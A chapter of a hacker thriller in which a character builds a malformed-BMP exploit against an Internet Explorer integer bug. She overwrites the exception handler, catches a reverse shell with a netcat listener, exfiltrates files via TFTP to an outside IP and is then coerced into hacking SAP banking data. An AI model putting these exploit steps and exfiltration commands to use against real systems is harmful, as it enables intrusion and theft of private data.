Exceptional Circumstances | Stealing the Network. How to Own a Continent

Next day, h3X gets back to her little experiment. She opens the bitmap file created yesterday in a hex editor and starts looking at the file format. The first line contains the variable gta mentioned. Pulling up the documentation of the BMP file format, she sees clearly where the modifications to the picture need to be made:

 BitmapFileHeader                   Type            19778                   Size            3118                   Reserved1       0                   Reserved2       0                   OffsetBits      118

That means that the eleventh byte starts the offset bits, a four-byte variable. Now, four-byte vars are commonly called integers in C programming-centric environments. This is what the hacker had complained about in his e-mail regarding the coding practices in Redmond. Using an integer to store data from a four-byte chunk of user input means that the user data will use all 32 bits of the integer. What many people keep forgetting is, an image downloaded as part of a web page is still user data and needs to be handled with the same care as data entered in a username or password field of an application.

Now, the bug in Microsoft s code is this: an integer as declared there has 31 bits for the numerical value. The 32 ^nd bit is used to tell the processor if this is meant as a positive (0) or a negative (1) value. But since the data in the file is just plain bytes, there is no such difference when looking at the BMP file header. h3X goes ahead and changes the offset bits field in the first line of the header to FFFFFFFF:

 0000000: 424d 3600 0600 0000 0000  ffff ffff  2800  BM6...........(.

Then she saves the file and puts it on her local web server as an image embedded in the start page. Starting Internet Explorer, h3X surfs to the server and IE instantly disappears from her screen. Well, that worked , she thinks. Looking back at the code, she instantly knows what happened . The data FFFFFFFF was loaded into the variable _bmfh.bfOffBits. Since this is a signed integer, the uppermost bit became one and marked the real value of the variable as “1. Now, when

 cbSkip = _bmfh.bfOffBits - cbRead;

is calculated, it becomes even smaller because subtracting something from “1 never makes it positive, as everyone with a tightly planned bank account learns the hard way sooner or later. The test

 if (cbSkip > 1024)

of course, results in false as well, because something like “17 is in fact smaller than 1024 and in the next line something brown and seriously smelly hits the fan:

 if (!Read(abDummy, cbSkip))

The function Read() obviously expects an unsigned integer as the number of bytes to read and the buffer to read them in, which is abDummy in this case. So the negative value in cbSkip suddenly becomes a very, very large positive value again, something around 4 Gigabytes. Although Windows machines tend to have and need a lot of RAM, 4 Gigs is more than Internet Explorer planned for. The buffer is only 4kb big. The read operation basically writes data across important data structures on the stack of the IE process until a border is reached and the processor tells Windows that this program is massively misbehaving and should receive capital punishment .

In regards to capital punishment, Windows is a little bit like first world juristic systems. If you can afford to spend some of your money (or memory) on someone handling the case for you, such as a lawyer, it gives you more freedom and a chance to escape the electrical chair , lethal injection, or kernel process termination and display of a Dr. Watson window. What is a lawyer in the real world is a Structured Exception Handler in Windows. All the software has to do is install this SEH before doing anything that could possibly go wrong and proceed. If everything goes as planned, the software will remove the SEH afterward and has only spend a few (8) bytes of its process space for that as some type of insurance. In case things do go wrong, the SEH is called by the NT Kernel “ or ntdll.dll, to be more precise. It s like the guaranteed call to your lawyer before any of the police officers are allowed to interview you. And like anyone with enough money (or memory), you can have more than one SEH, just in case the first can t get you out of jail in less then 10 minutes.

h3X realizes that this is also the reason why the IE window just disappeared without so much as a message box. Starting IE again in OllyDbg and opening the same web page, she sees what happens: the copy operation overwrites not only the buffer, the important addresses which are located after it and some data structures, but it also overwrites the exception handler address before it s interrupted by the processor, which is not amused about this bloat.

Hehe, this is almost too simple, h3X says to the screen and smiles. By overwriting the address of its SEH, Internet Explorer committed a crime and lost his address book with the phone number of his insurance agent and his only lawyer while fleeing the crime scene. What she plans to do is to replace the phone number in his address book and hand it back to him, so he can call what he thinks is his lawyer. h3X proceeds and modifies the image so that at the right position it contains an address of an instruction that is part of Internet Explorer. Somewhere in one of the many DLLs IE uses, she finds the instruction she is after. Since these DLLs end up in the same position in memory every time you start IE, it will also work on different computers than hers. The instruction is JMP ESP, and allows h3X to put the little egg code she developed right behind the address.

It is done in a matter of minutes. Now all she has to do is put her shell code in the image and make sure it s correctly placed. A few little issues arise with the totally smashed stack memory of IE and her shellcode, but after another half an hour she s done with it and has something quite nice to show for it. h3X leans back and looks at the result. Many people don t understand where new exploits, so called 0-day, come from. They simply assume it comes from the Internet . But in fact, 0-day come from curious hackers “ and this particular one comes from h3X. She saves the file as FAUSTUS.BMP and copies it onto the web server hosting her little hacker web site: h3x.darklab.org.

Now her little experiment can start. The code that gets delivered and executed with the image will initiate a connection from the victim machine to one of her systems. Well, it isn t exactly her system, but the system considers the account she uses as the most privileged “ and well, computers don t lie, do they? h3X logs into the system and opens a process that will accept the connection and serve as her way to talk to the victim machine. The beauty of making the victim connect back to her is that most personal or corporate firewalls will allow it. Internet Explorer is supposed to make connections to all kinds of systems in the Internet and since it s an outgoing and not an incoming connection, it can t be a hacker, right?

 tanzplatz#  ssh root@pc102.lab.cmu.edu  root@pc102.lab.cmu.edu's password: [pc102:~]#  nc l p 4711 n v  listening on [any] 4711 ...

The only downside of her plan is boredom. Putting together the exploit has been the type of fun that h3X really enjoys. Waiting for the first person to access her web page with an Internet Explorer version 5.0 or 5.5 is not really entertaining. Maybe this is why everyone seems to ignore client side exploits, it s just too freaking boring , she thinks. To kill some time, she calls one of her hacker friends in town to see what s going on lately. When the phone finally gets a connection and the call is answered , she immediately starts talking:

Hey, it s me. How s it going?

Quite well, and yourself? her phone s speaker says.

I m having fun. Remember the bug they found in the leaked Windows source code? Got myself an exploit for it. Just as a hint, don t access my website with IE these days, h3X giggles.

You know, I would, just to see if you finally managed to get stable exploits done, but for some strange reason Google can t find the download site for Internet Explorer to run on FreeBSD.

Just for the fun of it, h3X enters Internet Explorer for FreeBSD into Google and clicks the I m Feeling Lucky button. She says, Hey there is at least a petition for IE on FreeBeasty. Want to sign it?

Very funny indeed, the person on the other end says. I wonder why one would ask for IE on FreeBSD. Next thing you know there s an Outlook Express messing around my system with root privileges because otherwise it would not be able to display the annoying little paperclip. Both of them laugh with the idea. They go on and chat about things to do in the near future, which conferences to go to, and other things. Then, after about half an hour, h3X interrupts the conversation as things start to happen on her terminal with the listener.

 listening on [any] 4711 ... connect to [212.227.119.68] from (UNKNOWN) [2.7.130.8] 32815 Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-1999 Microsoft Corp. C:\Program Files\Internet Explorer\>

Hey, listen, someone just bit it. I ll get back to you later. Bye, is all h3X says before quickly disconnecting the call. Someone accessed her web page and used the right type of browser. Obviously, the exploit worked and his Internet Explorer connected back to her little shell listener. From the command line it s already quite clear that the victim uses an English version of Windows, which makes things easier. There s nothing like taking over a Windows host only to then realize that it s French and you don t understand a word of what the output says.

The victim probably doesn t even know he just got owned. Internet Explorer will not crash or disappear when her exploit executes, but will just misbehave slightly. It ll have certain issues with displaying all kinds of pictures “ probably nothing unusual for the average Windows user. h3X looks at the strange IP address this guy is coming from. She accesses RIPE s whois database and checks for who has this network block assigned. To her surprise, the IP address range 2.0.0.0-2.255.255.255 is marked as RESERVED-2 . Usually, no computer with a browser should be using those IP addresses. In fact, they shouldn t be routed through the Internet as it is. Normally, a trace to this IP address would be in order now, but h3X needs to find out what type of computer/person she just owned.

She goes ahead and uses the well-known dir command to look at various directories. Normally, she would also try to access other drive letters, but that s not such a good idea right now. Assuming one of the drive letters is connected to a USB stick, or even worse to a floppy or CD-ROM drive, the sound of a removable media drive suddenly spinning into action could give away her presence. One should not forget that in this scenario, the victim is still sitting right behind the keyboard of his computer. While exploring the box, h3X stops at the listing of C:\. Wait a minute. This gets interesting. We are dealing with someone who got his box locked up quite tightly “ but for confidentiality, not exactly for security she thinks. The reason for this observation is that she finds a number of programs that are at least installed on the system. First and foremost the directory C:\SAFEGUARD\SGEASY tells her that a hard drive encryption software from the German vendor Utimaco is used. This software is neither freeware nor cheap, so either this chap is extremely paranoid or he has a good reason to hide his data. Speaking of which, h3X says to the screen, where is the data? She keeps looking around on the C drive but Documents and Settings contains only the usual crap and the system doesn t look that much used overall. She tries the command net use , to see if this guy may have all his data located on a server that he accesses using this computer, but no drive mappings appear. She checks around a few more files and directories and finds another one in C:\Program Files that gets her attention. Hell, this guy is seriously paranoid , she thinks when she discovers that PGP in its full corporate license mode is installed on the machine. This gives h3X an idea. Maybe the data is inside a PGPdisk.

The corporate PGP software comes with a number of add-on features that are widely used. One of those is the PGP disk, which will create a large file on your hard drive, encrypt it, and mount this file as it was another drive in your computer. When you place files in there, they get instantly encrypted and are never written in the clear on the media. Its easy-to-use interface made this software widely used. h3X remembers that there was a discussion about PGPdisk command line switches on one of the PGP mailing lists a while ago. Using Google to find this particular thread, she reads carefully through all the information and references. If the victim spotted her now and closed the connection, it d be better to not have touched anything yet. On the other hand, it s not very likely that he knows h3X is on his box, so she better study her options before invoking a program that might pop up unexpected messages on the user s screen , giving away her presence. Twenty minutes of reading later, she realizes that none of the undocumented command line switches will do what she s after, namely display a list of mounted PGPdisks on the system without opening some GUI window.

The hackse reverts to checking where the currently logged on user would place his files when he follows the standard windows directive:

 C:>  echo %HOMEPATH%  G:\Documents and Settings\Knuth\ C:>

Wondering what drive G: could be, h3X goes there. She assumes correctly that Windows would complain all over the place if this drive didn t exist. She then changes into the My Documents folder and, to her pleasure , finds several large files with the extension .pgd, which are in fact the suspected PGPdisk containers she is interested in. Since no network drives are mounted, she now changes her mind and decides to try a few other drive letters to see if there is anything connected. In the worst case, she is going to light up all the LEDs on CD-ROM drives , USB sticks, and other media this guy might have connected.

 C:>dir d: The device is not ready C:>dir e: The system cannot find the path specified. C:>

So drive D appears to be a CD-ROM or something along those lines. She goes on checking other drives and finally ends up at the letter K. Here, the output of the dir command looks a lot more interesting. The directory contains a number of subdirectories with strange names such as The Don , Dex , Paul Meyer , Matthew Ryan . Maybe this guy is a publisher and just wants to keep the material from his authors secure , h3X wonders. She has heard that even some of the publishers who make money with computer security books on a regular basis now actually read the stuff they publish and begin to live security. But after all, those directories could be anything. She keeps going through the names when she finds one that s named Candidates . CDing in there, she finds a single file called candidates.doc. h3X would love to get her fingers on the file. But to do that, she will need to get the file down from the computer that is used by a person named Knuth . She decides to take a chance. Maybe he will notice the activity and shut the connection down, maybe he even has a personal firewall that will warn him of the activity from the tftp.exe command line program. But curiosity gets the better part of h3X, since this is what the whole experiment is all about.

She quickly checks to make sure the IP address of the system is actually the one connecting to her and does not get translated somewhere on the way when passing through a firewall. Most firewalls these days actually drop TFTP, since it s so widely used by hackers, but there is very limited use for legitimate system administrators “ at least when accessing something outside of their perimeter. Luckily, the IP address actually belongs to the system itself, so the only thing that could ruin the plan is a tightly configured personal firewall.

 C:>g: G:>cd Candidates G:\Candidates>tftp i 212.227.119.68 PUT candidates.doc f.doc Transfer successful: 46080 bytes in 196 seconds G:\Candidates>

Now h3X is excited. It worked, and for the moment she doesn t waste a single thought on the possibility of being spotted by the (former) owner of the file. All she wants to know is what s in the file. She opens the file using antiword, a tool that she would like to kiss the author for every time she uses it. It makes a readable ASCII version out of these big Microsoft Word documents and one can pipe this to less . The fascinating part of antiword is that it can often cope with more types of .doc files than any version of Word can. In short, it s an excellent piece of work and very useful.

Looking at the output, she leans back and takes it all in. There is a list of people behind simple bullet points. Some of them are listed by what appears to be their real names, some with handles that look like hackers, and some have no identifier whatsoever “ just a phone number or an e-mail address. Behind every entry are a few comma-separated notes, mostly single words. As expected, h3X doesn t know most of the names on the list. To her complete puzzlement, she realizes that she does know a few of them by name and even two personally from hacker conferences. All of the names she knows have a few comments on them and one that unifies them all: (OUT). This single word in parentheses suggests that whatever these people were candidates for, they weren t chosen for the task. But why would you collect a list of hackers? she asks the window that still has an open shell to the remote Windows system.

Because the answer to that question does not show up on her screen, she resumes looking at the files in this particular drive. She checks a few filenames in the other directories. The file system structure now makes more sense, since many of the directories have names of people on this list “ all names of those without the mysterious (OUT) remark. For no particular reason, she decides to check the directory named Paul Meyer . It contains a number of files but none of the names makes any particular sense. One file is a TIFF, so may be this is a picture of the guy or something else that might yield a hint on what she stumbled upon here. So h3X transfers the file PaulStJames.tiff again with TFTP down to her system. Unfortunately, this one she also has to transfer all the way down to the system she s working on, since the rooted system she used for the back connect shell doesn t have a X Windows system installed and you better have some type of graphic support to look at a picture. When the file is finally on her hard drive, she opens it with the electronic eyes viewer and looks at what she s got here.

Holly shit! is all she manages to say. What she s looking at appears to be a scan of a death certificate for this guy named Paul Meyer. The document looks official and real. Now she also sees that it is a South African document. Oh f she says, trails off and her fingers start flying on the keyboard. She closes the remote shell on this cursed Windows system and also on the hop she used to open the remote shell. Then she logs into her web site and removes the image source tag to the client site exploit image. Having done all that, she connects to her home router and terminates the Internet connection. Then, she just takes her trembling fingers from the keyboard, embracing herself as if to warm her own body. She tries to think it all over, but the only words that keep appearing in her head are This is not good. This is definitely not good .

h3X doesn t really know how long she s been sitting in that embryo posture , staring into the room. There are very few things that can scare her, but just having fun making and using an exploit and ending up on a highly encrypted end user system with scans of death certificates is really pushing hard on her coolness. She nearly jumps out of her skin when some electronic melody breaks the silence around her. Her mood changes from being scared to being annoyed when she realizes that it is her mobile phone. She inspects the display, but the only information on it is simply incoming call . As if I didn t know that from the sound you are making, she says to the device. Wondering who that could be, she presses the green button to answer. A deep, calm voice on the other end says immediately, Do you want to die?

h3X can t say a word for a few seconds. She is not paralyzed at all, but even with a high performance brain, it takes a few time ticks before all the synapses wake up, connect, talk to each other. So it s even worse than I expected , she thinks, suddenly calming down since her focus is needed right here and now. I guess the answer to that is no, she says. Again it takes a few seconds before anything happens and h3X suddenly understands that this is not only the guy she just owned but he is, in fact, surprised to talk to a girl. Taking into account that he managed to figure out her mobile phone number so quickly, it is surprising the he missed that fact. But then again, he was in a rush and it s not always obvious with those foreign names. He didn t even realize that his chances of talking to someone who speaks acceptable English were fairly slim.

Why did you break into my computer, kid? the voice says.

Well, technically, you broke into your own computer by surfing to my web page. she says with a little bit more strength than before. She begins to feel better. Whatever happens next, she got a general picture of the situation and that makes for a better outlook on the future “ even if that s a short one.

Don t play any games with me. From what I see here, you already know what consequences you could face for that. The fact that he uses the word could , not something more final in meaning is reassuring to h3X. She doesn t see any point in saying anything in response. He has called her, so it s his move.

Okay, give me a very good reason to not kill you, and I might consider it, the voice comes back.

Well, since you are obviously compiling a list of hackers for some project of yours, you called the right number, she says. She s convinced that begging and crying is not going to help in her current situation, but proposing a good deal to the guy could improve her position “ not that it could get any worse than it already is.

I have seen a bit of your work on your web page while you hacked my computer, the voice goes on. Why do you concentrate on this SAP stuff? What type of access do you gain with that and to what type of companies does this apply?

The human mind can be controlled to a certain degree, but in stress situations, with the maximum focus, it also reacts quickly in ways that consciousness can t control. The only thing h3X can do is laugh out loud. She didn t want to, but this is just too hilarious. This guy is either a very black operation government person or a criminal interested in computers as a vector for his plots and he doesn t know what SAP is and why one would hack it? Way too funny.

Kid, what s so funny? Do you underestimate how dangerous your situation is?

No sir, she manages to say. Then she takes a deep breath and continues almost as calm as he is, SAP is used in the biggest businesses all over the world. All the top companies run it. In the years since it got first invented around 1972, it has been introduced into almost every big company on earth. Lately, with the Internet as primary platform of all global communication, this product opened up to the Internet as well. But the software security levels are still far behind. h3X pauses. How do I explain this? she wonders. Being threatened with death is not exactly what makes a girl feel safe and bold, but since the conversation is going into technical details, she starts to feel @home again. This is her world, and the guy might be a big gangster boss or whatever “ in cyberspace h3X is the witch and he s just some warlord, commanding big armies of orcs, but failing to realize the power of the queen of elves.

And then she got it, Have you been to some international airport lately? If so, have you noticed all those advertisements saying ˜such-and-such company runs SAP ? Just imagine every time you see such an ad, you know that you hold a copy to the keys of their kingdom. While this might have been a good explanation of why someone would actually concentrate on hacking SAP, it doesn t reflect the current level of h3X s knowledge and exploits at hand. In general, the statement was true, but in the little details that come up when you try to use other little details like buffer size checks (or lack thereof) to get into a system, it doesn t really work that easily. But the guy seems to already know that. So, can you get into any of those companies?

Well, not exactly “ but with some time, I guess, she says reluctantly. h3X feels like she s in a presales meeting with a big customer working for a dot-com startup. You need to get the point of technical excellence across, let them know that no task is too big for you “ assuming they provide the money for it. This mostly means a fair bit of technically correct bullshitting. You need to instantly decide what your state of the art could be, assuming you had more time before the meeting and more capital in general, but you must refrain from promising impossible things. This is one of the reasons you don t want to send a pure salesman , because he usually can t tell the difference, and buries the techies in piles of brown semi-liquid stinking excrements with his promises.

Okay kid. I m not really convinced yet, but I checked your site for a reason. Mark my words, I m not saying I won t kill you. All I m saying is that you should get to work and get me some information. Do you think you can get access to the bank account information of a few large corporations? h3X doesn t really have a choice. Yep, is all she manages to say in response. The person continues in the same calm voice as before, Then I want you to obtain bank account information, including where this company is located, what bank it uses, what scale regular transactions to and from their accounts are, and so on. Get me as much information as possible. If you get caught, the police will find your body somewhere in a river . If you don t fail me, you buy yourself a lottery ticket for staying alive . When you are done, send the information to Knuth@hushmail.com. h3X is about to confirm the information when she hears the little beep that signifies the end of a call.

After the call, she feels the effects the last half an hour had on her. Her hands shake not just a little bit and she desperately needs a cigarette. Walking over to her desk, she fetches one out of the pack and lights it. The sensation of smoke inhaled into her lungs calms her down. When the nicotine hits her brain hard, things around her start to spin just a little bit. Relaxing, she sinks into her chair. Now we need a good plan , she thinks. But suddenly she also feels very tired . I need to think this over. If I start right now, it s going to be a disaster , her thoughts travel. She tries to concentrate on the problem at hand, but her mind wanders off in different directions. She thinks about the people who could have more information, which leads to memories on past hacker conferences and gatherings, which leads to memories of happy drinking, parties and a few nice guys she spent some more time with. This Knuth guy didn t give her any time frame, but she s sure he was talking in the range of a few days, not weeks or months. Nevertheless, she doesn t feel like starting to hack a number of heavily protected Fortune 500 companies just now. Stuff like that needs time, but that s exactly what she doesn t have. But a little bit of pure simple thinking, projecting and planning should take place before she touches the computers again.

h3X walks over to her kitchen and takes one of the little Tupperware boxes her mother had pressed on her, not knowing what to do with all the plastic food storage solutions she bought at the last Tupperware party in her house. In this particular case, the boxes are used to keep things that would otherwise distribute a very distinct smell all over her place. She opens the one currently in use and takes some of the green herbs inside out of it. Then she sits down and rips off a fourth off a business card some moron had given her somewhere she doesn t remember. The business card and the herbs, together with parts of a cigarette and a 120mm rolling paper are soon assembled into a conical object that heavily contributes to her mental health and calmness. Sucking on the result of her craftsmanship, she leans back on the couch and considers her options. Soon she takes a piece of paper and starts to jot down a few tasks . Her mind now starts to grasp the whole situation she s in and explores ways to perform the job that would possibly save her life:

So he needs information from the wire transaction tables in a few SAP systems. The only obvious way to get to the R/3 core of the systems is to find a route that is direct and guaranteed to work. Just breaking into the network and trying to hack around long enough to find a route not blocked by a firewall is not going to work. What I need is the Internet side of the SAP, where you can be sure that some level of access into the backend exists, a system has to have connectivity to the main boxes. I remember these guys at this conference talking about the Internet Transaction Server. It should be possible to check a few company business2business sites and find a number of ITS installations. The guys at this conference also released a few exploits for the thing, but those are probably patched. If I remember correctly, the information about what s patched and what s not is not publicly available. Therefore, I need to find a person who has access to this information in order to determine how many ITS systems are unpatched. From that point, I could try to find a way directly to the database and take it from there.

Slowly, something that could be called a plan, or at least the outline of one, is forming in her head. She jots down a few bullet points on her piece of paper. Then, she picks up her phone and selects a name from the phone book. Hitting the call button, she holds the mobile phone to her ear. But instead of a ring tone she s instantly connected to the voice mail system and a badly sampled middle-aged female voice tells her that the person she called is currently unavailable. When the voice finally finishes her long message designed to increase the mobile phone airtime, h3X leaves a message, Hey Tom, it s me. I really need your help. You guys still have that SAP system these consultants screw around with? Could you try to get an access code to the SAP support pages or whatever they have so we can check on patches? Please, it s really, really important. Then she hangs up, snatches the remote control from the table and instructs the HiFi system on the other end of the room via binary data encoded in an infrared light beam to fill the silence of the room with some good music.